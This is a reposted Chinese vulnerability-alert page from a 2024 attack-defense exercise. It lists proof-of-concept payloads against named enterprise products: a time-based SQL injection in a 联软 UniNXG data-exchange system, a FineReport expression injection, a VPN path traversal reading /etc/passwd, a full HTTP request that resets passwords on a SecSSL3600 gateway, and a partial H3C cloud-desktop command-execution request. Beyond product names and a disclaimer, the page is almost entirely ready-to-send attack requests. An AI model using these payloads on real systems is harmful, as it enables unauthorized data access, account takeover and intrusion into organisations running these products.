深圳市联软科技联软安渡UniNXG安全数据交换系统存在延时注入漏洞
https://IP-Server/UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)--
![[2024HW - 2day] 漏洞预警 部分 含POC](http://cn-sec.com/wp-content/uploads/2024/07/8-1721754356.png "[2024HW - 2day] 漏洞预警 部分 含POC")
帆软FineReport未授权访问漏洞
/webroot/decision/view/ReportServer?test=&n={__fr_locale__=sql(sql,1,1)}
![[2024HW - 2day] 漏洞预警 部分 含POC](http://cn-sec.com/wp-content/uploads/2024/07/9-1721754356.png "[2024HW - 2day] 漏洞预警 部分 含POC")
启明星辰天清汉马 VPN 任意文件读取漏洞
/vpn/user/doxnload/client?ostype=../../../../../../../etc/passwd
![[2024HW - 2day] 漏洞预警 部分 含POC](http://cn-sec.com/wp-content/uploads/2024/07/4-1721754356.png "[2024HW - 2day] 漏洞预警 部分 含POC")
联软安渡UniNXG安全数据交换系统存在延时注入漏洞
UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)--![[2024HW - 2day] 漏洞预警 部分 含POC](http://cn-sec.com/wp-content/uploads/2024/07/5-1721754357.png "[2024HW - 2day] 漏洞预警 部分 含POC")
网神SecSSL3600安全接入网关系统任意密码修改漏洞(1day)
POST /changepass.php?type=2 HTTP/1.1host:Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@
![[2024HW - 2day] 漏洞预警 部分 含POC](http://cn-sec.com/wp-content/uploads/2024/07/10-1721754357.png "[2024HW - 2day] 漏洞预警 部分 含POC")
H3C Workspace 云桌面 远程命令执行漏洞
poc:/webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=.php&bkg_flag=0&check_btn_color=&des=undefinedexp:暂不公布
原文始发于微信公众号(朱厌安全):[2024HW - 2day] 漏洞预警 部分 含POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论